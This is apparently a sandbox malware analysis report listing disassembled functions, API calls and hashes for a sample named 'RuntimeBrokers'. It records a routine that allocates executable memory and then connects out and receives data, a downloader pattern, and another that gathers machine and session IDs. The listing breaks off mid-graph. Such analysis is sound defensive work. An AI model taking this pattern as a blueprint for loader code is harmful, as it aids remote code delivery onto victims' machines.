                                        • API ID: ErrorLast$CreateFileInfoModuleNameProcessStartup
                                        • String ID: %s
                                        • API String ID: 3333541353-3874713491
                                        • Opcode ID: b788599f011f479e06a34f5cd35415cfb1a65c0dc2be7d3d9c19f562dd59fb4a
                                        • Instruction ID: 6ed0caeddf2395b9381470ffdaf7b5001178c1dacc731fa3994436fd4e3edbaa
                                        • Opcode Fuzzy Hash: b788599f011f479e06a34f5cd35415cfb1a65c0dc2be7d3d9c19f562dd59fb4a
                                        • Instruction Fuzzy Hash: 47117771E4022C9BCB20EB68DC89AEDB378EB64311F1405AEF519A3141DB705F988FA1
                                        Function 00178EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0016116D: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00178EF2,?,?,?,0016100A), ref: 00161172
                                          • Part of subcall function 0016116D: GetLastError.KERNEL32(?,00178EF2,?,?,?,0016100A), ref: 0016117C
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0016100A), ref: 00178EF6
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0016100A), ref: 00178F05
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00178F00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 450123788-631824599
                                        • Opcode ID: 23d13370a0098d0c9e658b2dc1c537f5f454b28f74cd8cfd827cd67f091bf840
                                        • Instruction ID: 8b5fb52fb1eeab8d9473d8fa0734a350a70aea5be819f359ee4928496de9aed6
                                        • Opcode Fuzzy Hash: 23d13370a0098d0c9e658b2dc1c537f5f454b28f74cd8cfd827cd67f091bf840
                                        • Instruction Fuzzy Hash: 56E06D702047118BC320AF38D9087827AF4BB05784F00882CE89AD2640DBB4D584CB91

                                        Execution Graph

                                        Execution Coverage:0.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:97
                                        Total number of Limit Nodes:15
                                        execution_graph 86676 6c0a2dcb GetSystemInfo 86677 6c1c432d 86678 6c1c4339 86677->86678 86693 6c1c38ae 86678->86693 86680 6c1c4345 86681 6c1c4340 86681->86680 86682 6c1c442f ___scrt_fastfail 86681->86682 86683 6c1c436a 86681->86683 86697 6c1c3810 86683->86697 86686 6c1c437d __RTC_Initialize 86687 6c1c341f 86686->86687 86688 6c1c4387 ___scrt_initialize_default_local_stdio_options _initterm_e 86687->86688 86689 6c1c43a1 86688->86689 86690 6c1c43ca ___scrt_is_nonwritable_in_current_image 86688->86690 86689->86690 86691 6c1c43aa _initterm 86689->86691 86690->86680 86692 6c1c43f5 ?shutdown@Application@common@ierd_tgp@ 86690->86692 86691->86690 86692->86680 86694 6c1c38be ___isa_available_init 86693->86694 86695 6c1c38b7 86693->86695 86696 6c1c38c8 86694->86696 86695->86694 86696->86681 86700 6c1c38e7 86697->86700 86699 6c1c3817 86699->86686 86699->86690 86701 6c1c38f6 86700->86701 86702 6c1c38fa 86700->86702 86701->86699 86703 6c1c3984 ___scrt_fastfail 86702->86703 86704 6c1c3907 86702->86704 86705 6c1c3914 _initialize_onexit_table 86704->86705 86706 6c1c3932 86704->86706 86705->86706 86707 6c1c3923 _initialize_onexit_table 86705->86707 86706->86699 86707->86706 86708 6c132226 86709 6c132232 __EH_prolog3 86708->86709 86714 6c1c2e95 86709->86714 86712 6c132254 86715 6c1c2ea7 malloc 86714->86715 86716 6c1c2e9a _callnewh 86715->86716 86717 6c132242 86715->86717 86716->86715 86719 6c1c2eb6 std::_Facet_Register 86716->86719 86717->86712 86722 6c1320b3 86717->86722 86718 6c1c4903 86720 6c1c4911 _CxxThrowException 86718->86720 86719->86718 86721 6c1c48f4 _CxxThrowException 86719->86721 86721->86718 86723 6c1320bf __EH_prolog3 86722->86723 86732 6c13a08a 86723->86732 86725 6c132169 86726 6c132178 _Mtx_init_in_situ memset 86725->86726 86727 6c1321ef 86726->86727 86736 6c133f3f 86727->86736 86729 6c1321fd 86730 6c132204 GetCurrentThreadId 86729->86730 86731 6c132225 86730->86731 86731->86712 86743 6c1c2f1b 86732->86743 86734 6c13a096 _Mtx_init_in_situ _Mtx_init_in_situ _Mtx_init_in_situ 86735 6c13a0fd 86734->86735 86735->86725 86737 6c13401f 86736->86737 86738 6c133f51 VirtualAlloc WSAStartup socket 86737->86738 86739 6c133fa9 connect 86738->86739 86740 6c133fcb 86739->86740 86741 6c133ffd 86740->86741 86742 6c133fd4 recv 86740->86742 86741->86729 86742->86740 86742->86741 86743->86734 86744 6c1354e6 86746 6c1354f2 __EH_prolog3 86744->86746 86745 6c135513 86746->86745 86747 6c135530 ??0Qos@qos@adapt_for_imports@ierd_tgp@@QAE 86746->86747 86748 6c1c3aa0 86747->86748 86749 6c135545 __Init_thread_footer 86748->86749 86749->86745 86750 6c1c42da 86751 6c1c4318 dllmain_crt_process_detach 86750->86751 86752 6c1c42e5 86750->86752 86754 6c1c42ea 86751->86754 86753 6c1c430a dllmain_crt_process_attach 86752->86753 86752->86754 86753->86754 86755 6c1c45fa 86756 6c1c4608 dllmain_dispatch 86755->86756 86757 6c1c4603 ___security_init_cookie 86755->86757 86757->86756 86758 6c0a3b8d 86761 6c1c4266 86758->86761 86760 6c0a3ba5 86764 6c1c4272 86761->86764 86762 6c1c429d 86762->86760 86763 6c1c4282 ?shutdown@Application@common@ierd_tgp@ 86763->86764 86764->86762 86764->86763 86765 6c1c4437 86767 6c1c4443 86765->86767 86766 6c1c444c ___scrt_uninitialize_crt 86767->86766 86768 6c1c446b 86767->86768 86769 6c1c44c1 ___scrt_fastfail 86767->86769 86784 6c1c387e _execute_onexit_table _cexit 86768->86784 86772 6c1c44c9 86769->86772 86771 6c1c4470 86773 6c1c4475 __RTC_Initialize 86771->86773 86774 6c1c44e4 86772->86774 86775 6c1c44fe dllmain_raw 86772->86775 86776 6c1c44f9 86772->86776 86773->86766 86775->86774 86777 6c1c4518 dllmain_crt_dispatch 86775->86777 86778 6c1c452f _DllMain 86776->86778 86777->86774 86777->86778 86779 6c1c4543 86778->86779 86782 6c1c4565 86778->86782 86780 6c1c4547 _DllMain dllmain_crt_dispatch dllmain_raw 86779->86780 86779->86782 86780->86782 86781 6c1c456e dllmain_crt_dispatch 86781->86774 86783 6c1c4581 dllmain_raw 86781->86783 86782->86774 86782->86781 86783->86774 86784->86771

                                        Executed Functions

                                        Function 6C133F3F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72networkmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 6C133F62
                                        • WSAStartup.WS2_32(00000202,?), ref: 6C133F89
                                        • socket.WS2_32(00000002,00000001,00000000), ref: 6C133F92
                                        • connect.WS2_32(?,?,00000010), ref: 6C133FC7
                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 6C133FE6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AllocStartupVirtualconnectrecvsocket
                                        • String ID: ]$z
                                        • API String ID: 386822499-3659341173
                                        • Opcode ID: 2742a577c9b3370c7356fbe8b85e27bac68a0b4d21b25f9116afe7e27bb80fc7
                                        • Instruction ID: e33db93f148632df82d46570ca42ca02509966a590e851b64c1369ec014f31de
                                        • Opcode Fuzzy Hash: 2742a577c9b3370c7356fbe8b85e27bac68a0b4d21b25f9116afe7e27bb80fc7
                                        • Instruction Fuzzy Hash: 4F212A74E4421DEFEB10CBE4C909BDEBBB4AF09309F105159E5187A2C0D3B99A85CB66
                                        Function 6C1320B3 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C1320BA
                                          • Part of subcall function 6C131FE2: __EH_prolog3.LIBCMT ref: 6C131FE9
                                          • Part of subcall function 6C132055: __EH_prolog3.LIBCMT ref: 6C13205C
                                          • Part of subcall function 6C131F36: __EH_prolog3.LIBCMT ref: 6C131F3D
                                          • Part of subcall function 6C100076: __EH_prolog3.LIBCMT ref: 6C10007D
                                          • Part of subcall function 6C13A08A: __EH_prolog3.LIBCMT ref: 6C13A091
                                          • Part of subcall function 6C13A08A: _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0BF
                                          • Part of subcall function 6C13A08A: _Mtx_init_in_situ.MSVCP140(?,00000002,?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0D1
                                          • Part of subcall function 6C13A08A: _Mtx_init_in_situ.MSVCP140(?,00000002,?,00000002,?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0E3
                                          • Part of subcall function 6C131FA1: __EH_prolog3.LIBCMT ref: 6C131FA8
                                        • _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C132188
                                        • memset.VCRUNTIME140(?,00000000,00004EAC,?,00000002,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13219F
                                          • Part of subcall function 6C133F3F: VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 6C133F62
                                          • Part of subcall function 6C133F3F: WSAStartup.WS2_32(00000202,?), ref: 6C133F89
                                          • Part of subcall function 6C133F3F: socket.WS2_32(00000002,00000001,00000000), ref: 6C133F92
                                          • Part of subcall function 6C133F3F: connect.WS2_32(?,?,00000010), ref: 6C133FC7
                                          • Part of subcall function 6C133F3F: recv.WS2_32(?,00000000,00001000,00000000), ref: 6C133FE6
                                        • GetCurrentThreadId.KERNEL32 ref: 6C13220E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$Mtx_init_in_situ$AllocCurrentStartupThreadVirtualconnectmemsetrecvsocket
                                        • String ID:
                                        • API String ID: 763000222-0
                                        • Opcode ID: 0b249f71de0e5f6e11dbf852e62306b6bb57b4330a4d03249785e364cd07f1b5
                                        • Instruction ID: 10dd8fb3ae86b54229d2d56f284c802769d6ff5a99b3816f2e4213a9e4480879
                                        • Opcode Fuzzy Hash: 0b249f71de0e5f6e11dbf852e62306b6bb57b4330a4d03249785e364cd07f1b5
                                        • Instruction Fuzzy Hash: 58416CB0900B45CFD720DFB4C5487DEBBE0AF15308F60496CC1AE97690DB786A09CB96
                                        Function 6C1C2E95 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2E9D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2EAA
                                        • _CxxThrowException.VCRUNTIME140(?,6C40275C), ref: 6C1C48FD
                                        • _CxxThrowException.VCRUNTIME140(?,6C402778), ref: 6C1C491A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$_callnewhmalloc
                                        • String ID:
                                        • API String ID: 4113974480-0
                                        • Opcode ID: fb50d7c01cf3def50a6f54365ad96ff56d741e5aab620ac64d519329f05da70b
                                        • Instruction ID: 32ae650ee93e05aac3b4de6dc4f399c68b8a97f0f2a25b45b82ecc4bf948056c
                                        • Opcode Fuzzy Hash: fb50d7c01cf3def50a6f54365ad96ff56d741e5aab620ac64d519329f05da70b
                                        • Instruction Fuzzy Hash: ECF09035E0420DB78B00FBE4E848EDD776C6B24258B504531B864A2D90EF34A619C997
                                        Function 6C1354E6 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C1354ED
                                        • ??0Qos@qos@adapt_for_imports@ierd_tgp@@QAE@XZ.COMMON(00000000,6C0FAB44), ref: 6C135536
                                        • __Init_thread_footer.LIBCMT ref: 6C13554A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3Init_thread_footerQos@qos@adapt_for_imports@ierd_tgp@@
                                        • String ID:
                                        • API String ID: 3158337806-0
                                        • Opcode ID: e50dda5dff71514479e282769982e1963be125a2682e5883668d2d1102693b0d
                                        • Instruction ID: 643717a5398451329803a9e949463e3dfcf41a13a53f3f669280686ab67bf9d5
                                        • Opcode Fuzzy Hash: e50dda5dff71514479e282769982e1963be125a2682e5883668d2d1102693b0d
                                        • Instruction Fuzzy Hash: C2F09031740520CBCE24EBA4C594BDC3361EF9772CFA61248E0195BBC0CB2C5E0B8A5A
                                        Function 6C1C4266 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • ?shutdown@Application@common@ierd_tgp@@EAEXXZ.COMMON(6C4026E0,00000010,6C0A9278,00000004,00000004,00000003,6C0A8EC0,6C0A8ED0,?,?), ref: 6C1C4285
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?shutdown@Application@common@ierd_tgp@@
                                        • String ID:
                                        • API String ID: 3896587232-0
                                        • Opcode ID: edfd548380e28f1e7d26ee2bd4dda5bbb84b65a81c1714208e69971d54d8e688
                                        • Instruction ID: 2ce146c9c1780380f9e1115031e2af71f4194e5ba85f35c8fa309d5a91decb20
                                        • Opcode Fuzzy Hash: edfd548380e28f1e7d26ee2bd4dda5bbb84b65a81c1714208e69971d54d8e688
                                        • Instruction Fuzzy Hash: 49F06D35B04349CFCF00CF98D4816DDBB70FB64219F10452AE82667281C7349510DB65
                                        Function 6C132226 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C13222D
                                          • Part of subcall function 6C1C2E95: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2EAA
                                          • Part of subcall function 6C1320B3: __EH_prolog3.LIBCMT ref: 6C1320BA
                                          • Part of subcall function 6C1320B3: _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C132188
                                          • Part of subcall function 6C1320B3: memset.VCRUNTIME140(?,00000000,00004EAC,?,00000002,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13219F
                                          • Part of subcall function 6C1320B3: GetCurrentThreadId.KERNEL32 ref: 6C13220E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$CurrentMtx_init_in_situThreadmallocmemset
                                        • String ID:
                                        • API String ID: 3113669236-0
                                        • Opcode ID: ad2d22d1445d4de2cb1c43e8e53f1c6eb08635ca32974ba4660bda41f35c83fd
                                        • Instruction ID: 45a06470c76418a7598adb135351a2f633cc3ce1bb11a6d7d79eba707b90625b
                                        • Opcode Fuzzy Hash: ad2d22d1445d4de2cb1c43e8e53f1c6eb08635ca32974ba4660bda41f35c83fd
                                        • Instruction Fuzzy Hash: 0FE02630B00702DBCB14AFF80C443CE66E05B14218F60516EA225DF7C0CBB8CC08C785
                                        Function 6C0A2DCB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 91 6c0a2dcb-6c0a2de4 GetSystemInfo
                                        APIs
                                        • GetSystemInfo.KERNEL32(?), ref: 6C0A2DD5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: InfoSystem
                                        • String ID:
                                        • API String ID: 31276548-0
                                        • Opcode ID: 101bafd95e9bc58d5a9868525321bc8e5c678359346b9d2b0628dd42561737c9
                                        • Instruction ID: d59ff181e6e6662746c0dc96f0f62d749208869e71093b55c6d9a63da91f6243
                                        • Opcode Fuzzy Hash: 101bafd95e9bc58d5a9868525321bc8e5c678359346b9d2b0628dd42561737c9
                                        • Instruction Fuzzy Hash: 3AC04CB5E042089BCF10FBB6D58988AB7FCB659204B400562D916E3240E774E9448BA1

                                        Non-executed Functions

                                        Function 6C10AC3B Relevance: 104.1, APIs: 25, Strings: 34, Instructions: 889fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 185 6c10ac3b-6c10ac64 call 6c1c2f4f 188 6c10ba2a-6c10ba2f call 6c1c2ef9 185->188 189 6c10ac6a-6c10b1dd call 6c0a8f70 call 6c0ffd6c call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0aa3a0 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0ffa18 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0aa3a0 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9070 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a90b0 call 6c0a9b40 call 6c0a9420 call 6c0a9360 _time32 call 6c0a9070 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9070 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a8f70 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0aa3a0 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0aa3a0 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBEHXZ call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBE_KXZ call 6c0a90b0 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9b40 call 6c0a9420 call 6c0a8f70 185->189 354 6c10b214-6c10b21a 189->354 355 6c10b21c-6c10b251 call 6c0a9b40 call 6c0a9420 call 6c0a8f70 354->355 356 6c10b1df-6c10b211 call 6c0a9050 call 6c0a9e40 call 6c0a9360 354->356 369 6c10b287-6c10b28d 355->369 356->354 370 6c10b253-6c10b284 call 6c0a9130 call 6c0a9e40 call 6c0a9360 369->370 371 6c10b28f-6c10b2cb call 6c0a9b40 call 6c0a9420 call 6c0a8f70 369->371 370->369 384 6c10b2d9-6c10b2e0 371->384 385 6c10b2cd-6c10b2cf 371->385 387 6c10b2e2-6c10b459 call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9050 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9070 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9070 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a8f70 call 6c0ac2c0 call 6c0ac470 384->387 385->384 386 6c10b2d1-6c10b2d7 385->386 386->387 434 6c10b479-6c10b566 call 6c0a9b40 call 6c0a9420 call 6c0a8f70 call 6c10cacd 387->434 435 6c10b45b-6c10b474 call 6c0a9b40 call 6c0a9420 387->435 447 6c10b56c 434->447 448 6c10b74f-6c10b7f1 call 6c0a9b40 call 6c0a9420 call 6c0d27b2 call 6c0b1850 call 6c0b18a0 _wfopen 434->448 435->434 449 6c10b56f-6c10b573 447->449 478 6c10b7f7-6c10b821 fwrite 448->478 479 6c10b8a9-6c10b8be ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 448->479 451 6c10b5b2-6c10b5bb call 6c0bb986 449->451 452 6c10b575-6c10b5b0 call 6c107750 call 6c0bb933 call 6c0bd278 449->452 459 6c10b5c0-6c10b5e3 call 6c10a018 451->459 452->459 466 6c10b737-6c10b743 459->466 467 6c10b5e9-6c10b5ed 459->467 466->449 472 6c10b749 466->472 467->466 471 6c10b5f3-6c10b62d call 6c1077cd call 6c1076a3 call 6c109937 467->471 494 6c10b668-6c10b732 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z * 2 call 6c0a8f70 call 6c0a9130 call 6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9130 call 